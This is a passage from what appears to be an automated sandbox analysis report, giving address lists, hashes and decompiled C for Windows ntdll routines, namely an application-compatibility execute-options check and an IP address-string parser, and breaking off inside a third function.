                                                                                                                                                  0x00cbe928
                                                                                                                                                  0x00cbe982
                                                                                                                                                  0x00cbe98a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe99a
                                                                                                                                                  0x00cbe99e
                                                                                                                                                  0x00cbe9a3
                                                                                                                                                  0x00cbe9a8
                                                                                                                                                  0x00cbe9b9
                                                                                                                                                  0x00cbe978
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe978
                                                                                                                                                  0x00cbe98a
                                                                                                                                                  0x00cbe92a
                                                                                                                                                  0x00cbe931
                                                                                                                                                  0x00cbe944
                                                                                                                                                  0x00cbe944
                                                                                                                                                  0x00cbe950
                                                                                                                                                  0x00cbe954
                                                                                                                                                  0x00cbe959
                                                                                                                                                  0x00cbe95e
                                                                                                                                                  0x00cbe963
                                                                                                                                                  0x00cbe970
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe975
                                                                                                                                                  0x00cbe93b
                                                                                                                                                  0x00cbe980
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe980
                                                                                                                                                  0x00cbe942
                                                                                                                                                  0x00cbe94b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe94b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbe942
                                                                                                                                                  0x00c913f4
                                                                                                                                                  0x00c913f4
                                                                                                                                                  0x00c913f9
                                                                                                                                                  0x00c913fc
                                                                                                                                                  0x00c913ff
                                                                                                                                                  0x00c91406
                                                                                                                                                  0x00cbe9cc
                                                                                                                                                  0x00cbe9d2
                                                                                                                                                  0x00cbe9d2
                                                                                                                                                  0x00cbe9cc
                                                                                                                                                  0x00c9140c
                                                                                                                                                  0x00c91411
                                                                                                                                                  0x00c91431
                                                                                                                                                  0x00c9143a
                                                                                                                                                  0x00c9143c
                                                                                                                                                  0x00c9143f
                                                                                                                                                  0x00c9143f
                                                                                                                                                  0x00c91442
                                                                                                                                                  0x00c91447
                                                                                                                                                  0x00c914a8
                                                                                                                                                  0x00c914ac
                                                                                                                                                  0x00cbe9e2
                                                                                                                                                  0x00cbe9e7
                                                                                                                                                  0x00cbe9ec
                                                                                                                                                  0x00cbea05
                                                                                                                                                  0x00cbea05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c91449
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c91449
                                                                                                                                                  0x00c9144c
                                                                                                                                                  0x00c91459
                                                                                                                                                  0x00c91462
                                                                                                                                                  0x00c91469
                                                                                                                                                  0x00c9146a
                                                                                                                                                  0x00c91470
                                                                                                                                                  0x00c91473
                                                                                                                                                  0x00c91476
                                                                                                                                                  0x00c91476
                                                                                                                                                  0x00c91490
                                                                                                                                                  0x00c91495
                                                                                                                                                  0x00c9138e
                                                                                                                                                  0x00c91390
                                                                                                                                                  0x00c91397
                                                                                                                                                  0x00c91398
                                                                                                                                                  0x00c91399
                                                                                                                                                  0x00c913a1
                                                                                                                                                  0x00c913a4
                                                                                                                                                  0x00c913a4
                                                                                                                                                  0x00c91498
                                                                                                                                                  0x00c9149c
                                                                                                                                                  0x00c9149f
                                                                                                                                                  0x00c914a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c914a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c914a4
                                                                                                                                                  0x00c91413
                                                                                                                                                  0x00c91415
                                                                                                                                                  0x00c91416
                                                                                                                                                  0x00c91419
                                                                                                                                                  0x00c9141c
                                                                                                                                                  0x00c91422
                                                                                                                                                  0x00c913b7
                                                                                                                                                  0x00c913bc
                                                                                                                                                  0x00c913bf
                                                                                                                                                  0x00c913bf
                                                                                                                                                  0x00c913c2
                                                                                                                                                  0x00c91424
                                                                                                                                                  0x00c91424
                                                                                                                                                  0x00c91424
                                                                                                                                                  0x00c91427
                                                                                                                                                  0x00c9142b
                                                                                                                                                  0x00c9142c
                                                                                                                                                  0x00c9142c
                                                                                                                                                  0x00c9142c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c9141c
                                                                                                                                                  0x00c91411

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 10617a1710b2d807960967e73edc257a541cada671106607eb109c712eefef58
                                                                                                                                                  • Instruction ID: dd52e4244b39c7ee55b30df15967e922f0eab13a6c2940c78a526f4f5fcd884a
                                                                                                                                                  • Opcode Fuzzy Hash: 10617a1710b2d807960967e73edc257a541cada671106607eb109c712eefef58
                                                                                                                                                  • Instruction Fuzzy Hash: 136126B1D00656AACF25DF5AC8858FEBBB5EF98301B18C16DF8A647640D234AB44DB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C87EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E00C87EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xd32088; // 0x777a2caa
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00C87F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00CA3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00C5DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xd34218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00CA3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00C60D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00CA3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00C68375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00CA3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00CCE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00CA3F92();
					_t38 = 1;
					L2:
					return E00C5E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                  0x00c87f08
                                                                                                                                                  0x00c87f0f
                                                                                                                                                  0x00c87f12
                                                                                                                                                  0x00c87f1b
                                                                                                                                                  0x00c87f31
                                                                                                                                                  0x00ca3ead
                                                                                                                                                  0x00ca3eb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca3eba
                                                                                                                                                  0x00ca3ecd
                                                                                                                                                  0x00ca3ed2
                                                                                                                                                  0x00ca3ee1
                                                                                                                                                  0x00ca3ee7
                                                                                                                                                  0x00ca3eec
                                                                                                                                                  0x00ca3f12
                                                                                                                                                  0x00ca3f18
                                                                                                                                                  0x00ca3f1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca3f20
                                                                                                                                                  0x00ca3f26
                                                                                                                                                  0x00ca3f28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca3f2e
                                                                                                                                                  0x00ca3f30
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca3f3a
                                                                                                                                                  0x00ca3f3b
                                                                                                                                                  0x00ca3f53
                                                                                                                                                  0x00ca3f64
                                                                                                                                                  0x00ca3f69
                                                                                                                                                  0x00ca3f6c
                                                                                                                                                  0x00ca3f6d
                                                                                                                                                  0x00ca3f6f
                                                                                                                                                  0x00cae304
                                                                                                                                                  0x00cae30f
                                                                                                                                                  0x00cae315
                                                                                                                                                  0x00cae31e
                                                                                                                                                  0x00cae321
                                                                                                                                                  0x00cae327
                                                                                                                                                  0x00cae329
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cae32f
                                                                                                                                                  0x00cae32f
                                                                                                                                                  0x00cae337
                                                                                                                                                  0x00cae33a
                                                                                                                                                  0x00cae33b
                                                                                                                                                  0x00cae33d
                                                                                                                                                  0x00cae33f
                                                                                                                                                  0x00cae341
                                                                                                                                                  0x00cae341
                                                                                                                                                  0x00cae34e
                                                                                                                                                  0x00cae353
                                                                                                                                                  0x00cae358
                                                                                                                                                  0x00cae35d
                                                                                                                                                  0x00cae35f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cae365
                                                                                                                                                  0x00cae365
                                                                                                                                                  0x00cae368
                                                                                                                                                  0x00cae36e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cae374
                                                                                                                                                  0x00cae32f
                                                                                                                                                  0x00ca3f75
                                                                                                                                                  0x00ca3f7a
                                                                                                                                                  0x00ca3f7c
                                                                                                                                                  0x00ca3f7e
                                                                                                                                                  0x00ca3f86
                                                                                                                                                  0x00c87f39
                                                                                                                                                  0x00c87f47
                                                                                                                                                  0x00c87f47
                                                                                                                                                  0x00c87f37
                                                                                                                                                  0x00c87f37
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00CA3F12
                                                                                                                                                  Strings
                                                                                                                                                  • Execute=1, xrefs: 00CA3F5E
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00CA3F4A
                                                                                                                                                  • ExecuteOptions, xrefs: 00CA3F04
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00CA3F75
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00CA3EC4
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00CAE345
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00CAE2FB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BaseDataModuleQuery
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 3901378454-484625025
                                                                                                                                                  • Opcode ID: 935c5a28e0b678ae623ecd1b8fdd55472177f11c3ed0048ed3aca8f4283717ad
                                                                                                                                                  • Instruction ID: bb366d0e67f46a6292d4df6b142ccd4955836142a5850749f28942051dfdf36f
                                                                                                                                                  • Opcode Fuzzy Hash: 935c5a28e0b678ae623ecd1b8fdd55472177f11c3ed0048ed3aca8f4283717ad
                                                                                                                                                  • Instruction Fuzzy Hash: 9F410932A4030D7ADF20EAD4DCC6FDA73BCAB15709F1401A9F605E7091E670DB899BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C90B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00C90B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00C68980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00C5DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00C90CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00C90CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00C906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00C906BA(_t135, _t178) == 0 || E00C90A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00C90CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00C90CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00C906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00C906BA(_t124, _t142) == 0 || E00C90A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                  0x00c90b21
                                                                                                                                                  0x00c90b24
                                                                                                                                                  0x00c90b27
                                                                                                                                                  0x00c90b2a
                                                                                                                                                  0x00c90b2d
                                                                                                                                                  0x00c90b30
                                                                                                                                                  0x00c90b33
                                                                                                                                                  0x00c90b36
                                                                                                                                                  0x00c90b39
                                                                                                                                                  0x00c90b3e
                                                                                                                                                  0x00c90c65
                                                                                                                                                  0x00c90c68
                                                                                                                                                  0x00c90c6a
                                                                                                                                                  0x00c90c6f
                                                                                                                                                  0x00cbeb42
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb48
                                                                                                                                                  0x00cbeb48
                                                                                                                                                  0x00c90c75
                                                                                                                                                  0x00c90c7a
                                                                                                                                                  0x00cbeb54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb5a
                                                                                                                                                  0x00c90c80
                                                                                                                                                  0x00c90c84
                                                                                                                                                  0x00cbeb98
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeba6
                                                                                                                                                  0x00c90cb8
                                                                                                                                                  0x00c90cba
                                                                                                                                                  0x00c90cd3
                                                                                                                                                  0x00c90cda
                                                                                                                                                  0x00c90ce4
                                                                                                                                                  0x00c90ce9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90cec
                                                                                                                                                  0x00c90c8c
                                                                                                                                                  0x00cbeb63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb70
                                                                                                                                                  0x00cbeb75
                                                                                                                                                  0x00cbeb7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb8c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb8c
                                                                                                                                                  0x00c90c96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90ca2
                                                                                                                                                  0x00c90cac
                                                                                                                                                  0x00c90cb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b44
                                                                                                                                                  0x00c90b47
                                                                                                                                                  0x00c90b49
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b4f
                                                                                                                                                  0x00c90b50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b56
                                                                                                                                                  0x00c90b62
                                                                                                                                                  0x00c90b7c
                                                                                                                                                  0x00c90bac
                                                                                                                                                  0x00c90a0f
                                                                                                                                                  0x00cbeaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeac4
                                                                                                                                                  0x00cbeac4
                                                                                                                                                  0x00c90bd0
                                                                                                                                                  0x00c90bd0
                                                                                                                                                  0x00c90bd4
                                                                                                                                                  0x00c90bd9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bdb
                                                                                                                                                  0x00c90be0
                                                                                                                                                  0x00cbeb0e
                                                                                                                                                  0x00c90a1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90a1a
                                                                                                                                                  0x00cbeb1a
                                                                                                                                                  0x00cbeb1f
                                                                                                                                                  0x00cbeb27
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb36
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb36
                                                                                                                                                  0x00c90bea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bf6
                                                                                                                                                  0x00c90c00
                                                                                                                                                  0x00c90c03
                                                                                                                                                  0x00c90c0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c0b
                                                                                                                                                  0x00cbeaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90a15
                                                                                                                                                  0x00c90bb6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bc6
                                                                                                                                                  0x00c90bc6
                                                                                                                                                  0x00c90bcb
                                                                                                                                                  0x00c90c15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c1d
                                                                                                                                                  0x00c90c20
                                                                                                                                                  0x00c90c21
                                                                                                                                                  0x00c90c24
                                                                                                                                                  0x00c90c24
                                                                                                                                                  0x00c90c26
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c26
                                                                                                                                                  0x00c90bcd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bcd
                                                                                                                                                  0x00c90b89
                                                                                                                                                  0x00c90b89
                                                                                                                                                  0x00c90b90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b96
                                                                                                                                                  0x00c90a04
                                                                                                                                                  0x00c90a04
                                                                                                                                                  0x00c90b9a
                                                                                                                                                  0x00c90b9a
                                                                                                                                                  0x00c90b9b
                                                                                                                                                  0x00c90b9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90ba5
                                                                                                                                                  0x00c90ac7
                                                                                                                                                  0x00c90aca
                                                                                                                                                  0x00cbeacf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeade
                                                                                                                                                  0x00cbeade
                                                                                                                                                  0x00cbeae3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeaf3
                                                                                                                                                  0x00cbeaf6
                                                                                                                                                  0x00cbeaf7
                                                                                                                                                  0x00cbeafe
                                                                                                                                                  0x00cbeb01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb01
                                                                                                                                                  0x00cbeacf
                                                                                                                                                  0x00c90ad0
                                                                                                                                                  0x00c90ad4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90ada
                                                                                                                                                  0x00c90ae6
                                                                                                                                                  0x00c90c34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c47
                                                                                                                                                  0x00c90c49
                                                                                                                                                  0x00c90c4a
                                                                                                                                                  0x00c90c4e
                                                                                                                                                  0x00c90c51
                                                                                                                                                  0x00c90c54
                                                                                                                                                  0x00c90c57
                                                                                                                                                  0x00c90c5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c60
                                                                                                                                                  0x00c90afb
                                                                                                                                                  0x00c90afe
                                                                                                                                                  0x00c90b02
                                                                                                                                                  0x00c90b05
                                                                                                                                                  0x00c90b08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b08
                                                                                                                                                  0x00c90ae6
                                                                                                                                                  0x00c90b44
                                                                                                                                                  0x00c909f8
                                                                                                                                                  0x00c909f8
                                                                                                                                                  0x00c909f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeaa0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID: .$:$:
                                                                                                                                                  • API String ID: 3965848254-2308638275
                                                                                                                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction ID: e6bd51c700a303c33195f0c3ef0ea221edfbb2758b99d9bdd27856e5f66462f5
                                                                                                                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction Fuzzy Hash: 0EA19D7190430AEFCF24CF64C84D6BEB7B5AF05305F34856AE862A7242DB309B41DB92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C90554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E00C90554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
